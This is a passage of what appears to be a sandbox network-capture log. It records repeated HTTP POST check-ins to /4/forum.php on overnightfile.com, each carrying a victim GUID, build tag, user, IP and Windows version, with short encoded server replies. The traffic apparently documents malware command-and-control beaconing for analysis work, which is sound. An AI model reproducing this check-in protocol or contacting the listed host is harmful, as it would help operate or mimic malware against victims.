                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:13.883595943 CEST906INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:13 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNHSMARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:14.181653023 CEST906OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:14.269927025 CEST907INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:13 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZBYAARRABw==0

Jul 14, 2020 11:22:14.571012974 CEST  907  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)

Jul 14, 2020 11:22:14.658760071 CEST  907  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cGZATARRABw==0

Jul 14, 2020 11:22:14.983218908 CEST  908  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)

Jul 14, 2020 11:22:15.075644016 CEST  908  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZVEAARRABw==0

Jul 14, 2020 11:22:15.396648884 CEST  908  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)

Jul 14, 2020 11:22:15.490426064 CEST  909  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 42 47 54 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cBGTYARRABw==0

Jul 14, 2020 11:22:15.789973021 CEST  909  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)

Jul 14, 2020 11:22:15.878448963 CEST  909  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cFGTUARRABw==0

Jul 14, 2020 11:22:16.183455944 CEST  910  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)

Jul 14, 2020 11:22:16.271142006 CEST  910  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 42 54 47 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cBTGYARRABw==0

Jul 14, 2020 11:22:16.595324993 CEST  911  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)

Jul 14, 2020 11:22:16.685844898 CEST  911  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cFGTUARRABw==0

Jul 14, 2020 11:22:16.982656956 CEST  911  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)

Jul 14, 2020 11:22:17.069825888 CEST  912  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZYBAARRABw==0

Jul 14, 2020 11:22:17.381412029 CEST  912  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)

Jul 14, 2020 11:22:17.469480038 CEST  912  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 48 4b 50 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cHKPSARRABw==0

Jul 14, 2020 11:22:17.825907946 CEST  913  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)

Jul 14, 2020 11:22:17.913518906 CEST  913  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZAZAARRABw==0

Jul 14, 2020 11:22:18.221539021 CEST  913  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)

Jul 14, 2020 11:22:18.312180042 CEST  914  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 48 4d 4e 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cHMNSARRABw==0

Jul 14, 2020 11:22:18.600039959 CEST  914  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:18.687941074 CEST914INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:18 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 43 4b 50 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cCKPXARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:19.011029959 CEST915OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:19.104196072 CEST915INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:18 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTKPGARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:19.412626982 CEST916OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:19.503447056 CEST916INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:19 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBZAYARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:19.814019918 CEST916OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:19.908598900 CEST917INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:19 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 56 45 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQVEJARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:20.210131884 CEST917OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:20.313064098 CEST917INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:19 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 41 41 5a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cAAZZARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:20.631592989 CEST918OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:20.719944954 CEST918INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:20 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 4d 4e 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVMNEARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:21.028626919 CEST918OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:21.124447107 CEST919INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:20 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 43 58 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJCXQARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:21.448781013 CEST919OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
